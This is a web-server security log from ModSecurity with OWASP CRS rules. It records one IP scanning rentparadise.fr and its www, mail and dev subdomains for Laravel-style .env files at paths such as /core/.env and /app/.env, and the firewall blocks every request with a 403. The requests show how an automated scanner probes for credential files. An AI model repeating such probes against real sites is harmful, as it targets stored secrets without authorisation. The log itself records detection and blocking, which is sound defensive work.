[Mon May 11 13:32:12.461226 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vXwAAAMg"]
[Mon May 11 13:32:12.461443 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vXwAAAMg"]
[Mon May 11 13:32:12.461643 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vXwAAAMg"]
[Mon May 11 13:32:12.469065 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-POJEyNRN152ArORlnQAAAEM"]
[Mon May 11 13:32:12.469284 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-POJEyNRN152ArORlnQAAAEM"]
[Mon May 11 13:32:12.469532 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlnQAAAEM"]
[Mon May 11 13:32:12.471259 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0ZQAAAAA"]
[Mon May 11 13:32:12.471463 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0ZQAAAAA"]
[Mon May 11 13:32:12.471640 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0ZQAAAAA"]
[Mon May 11 13:32:12.483835 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vYAAAAMg"]
[Mon May 11 13:32:12.484038 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vYAAAAMg"]
[Mon May 11 13:32:12.484243 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vYAAAAMg"]
[Mon May 11 13:32:12.499526 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-POSQ-m-m0ukSShtdlwAAAUs"]
[Mon May 11 13:32:12.499724 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-POSQ-m-m0ukSShtdlwAAAUs"]
[Mon May 11 13:32:12.499913 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdlwAAAUs"]
[Mon May 11 13:32:12.515817 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-POJEyNRN152ArORloQAAAEM"]
[Mon May 11 13:32:12.516049 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-POJEyNRN152ArORloQAAAEM"]
[Mon May 11 13:32:12.516261 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORloQAAAEM"]
[Mon May 11 13:32:12.519691 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-PKy-5-wpj6Sx56Z0aAAAAAA"]
[Mon May 11 13:32:12.519912 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-PKy-5-wpj6Sx56Z0aAAAAAA"]
[Mon May 11 13:32:12.520094 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0aAAAAAA"]
[Mon May 11 13:32:12.522792 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-POSQ-m-m0ukSShtdmQAAAUs"]
[Mon May 11 13:32:12.523003 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-POSQ-m-m0ukSShtdmQAAAUs"]
[Mon May 11 13:32:12.523219 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdmQAAAUs"]
[Mon May 11 13:32:12.528205 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-PKO9RdIr1DwxYR1vZAAAAMg"]
[Mon May 11 13:32:12.528389 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-PKO9RdIr1DwxYR1vZAAAAMg"]
[Mon May 11 13:32:12.528574 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vZAAAAMg"]
[Mon May 11 13:32:12.538773 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-POJEyNRN152ArORlowAAAEM"]
[Mon May 11 13:32:12.538980 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-POJEyNRN152ArORlowAAAEM"]
[Mon May 11 13:32:12.539183 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlowAAAEM"]
[Mon May 11 13:32:12.543789 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0agAAAAA"]
[Mon May 11 13:32:12.544025 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0agAAAAA"]
[Mon May 11 13:32:12.544228 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0agAAAAA"]
[Mon May 11 13:32:12.545006 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-POSQ-m-m0ukSShtdmwAAAUs"]
[Mon May 11 13:32:12.545179 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-POSQ-m-m0ukSShtdmwAAAUs"]
[Mon May 11 13:32:12.545378 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdmwAAAUs"]
[Mon May 11 13:32:12.550322 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vZQAAAMg"]
[Mon May 11 13:32:12.550496 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vZQAAAMg"]
[Mon May 11 13:32:12.550673 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vZQAAAMg"]
[Mon May 11 13:32:12.561387 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-POJEyNRN152ArORlpAAAAEM"]
